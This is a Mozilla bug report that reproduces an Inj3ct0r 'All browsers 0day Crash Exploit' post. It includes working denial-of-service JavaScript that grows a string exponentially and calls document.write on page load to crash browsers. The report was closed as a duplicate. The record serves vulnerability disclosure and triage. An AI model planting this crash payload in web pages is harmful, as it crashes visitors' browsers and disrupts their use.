Closed Bug 563260 Opened 14 years ago Closed 14 years ago

Exploit discovered by inj3ct0r team

Categories

(Core :: DOM: HTML Parser, defect)

defect
Not set
critical

Tracking

()

RESOLVED DUPLICATE of bug 537620

People

(Reporter: sh.yaron, Unassigned)

References

()

Details

(Whiteboard: [sg:dupe 537620])

User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.3a5pre) Gecko/20100428 Ubuntu/9.04 (jaunty) Minefield/3.7a5pre
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.3a5pre) Gecko/20100428 Ubuntu/9.04 (jaunty) Minefield/3.7a5pre

Explained at the following URL:
http://www.inj3ct0r.com/exploits/12103

Reproducible: Always
===============================
All browsers 0day Crash Exploit
===============================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: Inj3ct0r Team

@Title: All browsers 0day Crash Exploit

@Authors: The_Exploited aka l3d aka Spoof && eidelweiss

@Mails: spoof@live.it && eidelweiss@cyberservices.com

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/ - http://inj3ct0r.com/

@Exploit for all browsers (Tested on: Mozilla Firefox // Internet Explorer // Google Chrome // Netscape // Opera):
<body onload="javascript:DoS();"></body>
 
<script>
 
function DoS() {
 
var buffer = '\x42';
for (i =0;i<666;i++) {
buffer+=buffer+'\x42';
document.write('<html><marquee><h1>'+buffer+buffer);
}
 
}
 
</script>

@Date: 2010-05-03


# Inj3ct0r.com [2010-05-03]
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Component: General → HTML: Parser
OS: Linux → All
Product: Firefox → Core
QA Contact: general → parser
Hardware: x86 → All
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 537620]
You need to log in before you can comment on or make changes to this bug.